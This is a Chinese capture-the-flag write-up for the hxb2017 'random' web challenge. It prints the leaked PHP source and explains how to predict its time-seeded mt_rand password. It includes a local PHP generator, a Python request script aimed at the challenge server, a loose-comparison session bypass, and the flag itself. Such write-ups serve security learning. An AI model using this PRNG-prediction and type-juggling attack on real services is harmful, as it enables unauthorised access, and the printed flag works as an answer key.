random

看了一下存在源碼泄露

<?php
error_reporting(0);
$flag = "*********************";
echo "please input a rand_num !";
function create_password($pw_length =  10){
    $randpwd = "";
    for ($i = 0; $i < $pw_length; $i++){
        $randpwd .= chr(mt_rand(100, 200));
    }
    return $randpwd;
}

session_start();

mt_srand(time());

$pwd=create_password();

echo $pwd.'||';    

if($pwd == $_GET['pwd']){
    echo "first";
    if($_SESSION['userLogin']==$_GET['login'])
        echo "Nice , you get the flag it is ".$flag ;
}else{
    echo "Wrong!";
}

$_SESSION['userLogin']=create_password(32).rand();

?>

然后就是隨機數種子的問題了被，我們看到時間戳是隨機數的種子，猜測服務器的時間是標準時間，在本地搭建一個php腳本跑出來，爆破的前42位，用另一個python腳本進行訪問
php腳本如下

<?php
session_start();
mt_srand(time());

for ($i = 0; $i < 42; $i++){
    echo mt_rand(100, 200);
    echo ",";
}
?>

然后我們python腳本如下

import requests,re
url_local = 'http://127.0.0.1/test.php'
url = 'http://114.215.138.89:10080/index.php?'
what = requests.get(url_local).content
what=what.split(',')
pwd =''
for i in range(10):
    pwd +="%"
    pwd +=str(hex(int(what[i])))[2:]
print pwd
tempurl =  url+"pwd="+ pwd.decode('gb2312')
print tempurl
html = requests.get(tempurl).content
print html
#hxb2017{6583be26c1403c25677c03ac7b3d1f22}

事實上我們繞過第一步就可以成功了，這里出題的問題，因為匹配userLogin的時候用的居然是弱類型，如果沒有輸入就是空了，和字符串正好匹配…救過果斷直接繞過

hxb2017{6583be26c1403c25677c03ac7b3d1f22}